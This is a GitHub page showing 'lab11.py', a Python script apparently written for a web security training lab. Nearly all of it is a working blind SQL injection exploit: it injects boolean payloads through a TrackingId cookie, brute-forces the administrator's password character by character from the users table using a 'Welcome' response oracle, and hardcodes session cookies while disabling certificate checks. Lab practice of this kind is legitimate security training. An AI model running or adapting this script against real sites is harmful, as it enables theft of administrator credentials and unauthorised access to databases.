-
Notifications
You must be signed in to change notification settings - Fork 0
/
lab11.py
41 lines (33 loc) · 1.32 KB
/
lab11.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests
import urllib3
import re
from bs4 import BeautifulSoup
import sys
import urllib
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'https':'https://127.0.0.1:8080'}
def sqli_password(url):
password_extracted = ""
for i in range(1,21):
for j in range(32,126):
sqli_payload = "' and (select ascii(substring(password,%s,1)) from users where username='administrator')='%s'--" % (i,j)
sqli_payload_encoded = urllib.parse.quote(sqli_payload)
cookies = {'TrackingId': 'GGSJJ8pPRgB58NFv' + sqli_payload_encoded, 'session': 'rUhWlUg5rveqeChi1BdOblXP6smxYq5R'}
r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)
if "Welcome" not in r.text:
sys.stdout.write('\r' + password_extracted + chr(j))
sys.stdout.flush()
else:
password_extracted += chr(j)
sys.stdout.write('\r' + password_extracted)
sys.stdout.flush()
break
def main():
if len(sys.argv) != 2:
print("(+) Usage: %s <url>" % sys.argv[0])
print("(+) Example: %s www.example.com" % sys.argv[0])
url = sys.argv[1]
print("(+) Retrieving administrator password...")
sqli_password(url)
if __name__ == "__main__":
main()